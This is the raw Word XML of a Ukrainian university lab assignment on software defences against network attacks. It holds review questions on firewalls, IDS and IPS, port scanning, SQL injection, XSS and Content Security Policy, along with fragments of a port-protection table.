Content-Type для захисту API.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15672 (RabbitMQ)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 трафіку WebSocket-з’єднання.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2375 (Docker)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443 (HTTPS)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blacklist IP-адрес після 5 невдалих спроб.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:bookmarkEnd w:id="31"/>
    <w:bookmarkStart w:id="35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32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брандмауер і які його типи існують?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Чим IDS відрізняється від IPS?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Які порти потребують захисту в першу чергу?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сканування портів?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SQL-ін’єкція?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XSS і які його типи існують?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OWASP Top 10?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Що таке Content Security Policy?</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="32"/>
    <w:bookmarkStart w:id="33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Чим stateful firewall кращий за простий пакетний фільтр?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виявити сканування портів у мережевому трафіку? За якими ознаками?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параметризовані запити унеможливлюють SQL-ін’єкцію?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екранування виводу захищає від XSS, а фільтрація вводу — не завжди?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Коли доцільніший IDS, а коли IPS? Наведіть по одному сценарію.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Запишіть правило брандмауера, яке дозволяє лише вихідні з’єднання на порт 443.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Чому HTTPS не захищає від усіх атак? Наведіть два приклади.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Як CSP обмежує наслідки успішної XSS-атаки?</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="33"/>
    <w:bookmarkStart w:id="34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Побудуйте ешелоновану схему захисту веб-застосунку: які засоби на якому рівні та проти яких загроз працюють.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Система виявлення вторгнень дає багато хибних спрацьовувань. Назвіть причини та порядок налаштування, щоб їх зменшити без втрати чутливості.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Оцініть, чому повне блокування вхідного трафіку не є універсальним розв’язанням, і сформулюйте критерій відкриття порту.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1008"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Сформулюйте, чому більшість успішних атак використовує не технічні вразливості, а помилки конфігурації та людський фактор. Проілюструйте прикладами з роботи.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="34"/>
    <w:bookmarkEnd w:id="35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№9</dc:title>
  <dc:creator/>
  <dc:subject>pmzi</dc:subject>
  <cp:keywords/>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-09-27T20:14:51Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-09-27T20:14:51Z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9</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="5" name="order">
    <vt:lpwstr>8</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="6" name="preview">
    <vt:lpwstr>Вивчення засобів захисту від атак з мережі Internet.</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="7" name="shortTitle">
    <vt:lpwstr>Програмні засоби захисту від мережевих атак</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="8" name="subtitle">
    <vt:lpwstr>Програмні засоби захисту від атак з мережі Internet</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="9" name="type">
    <vt:lpwstr>lab</vt:lpwstr>
  </property>
</Properties>
</file>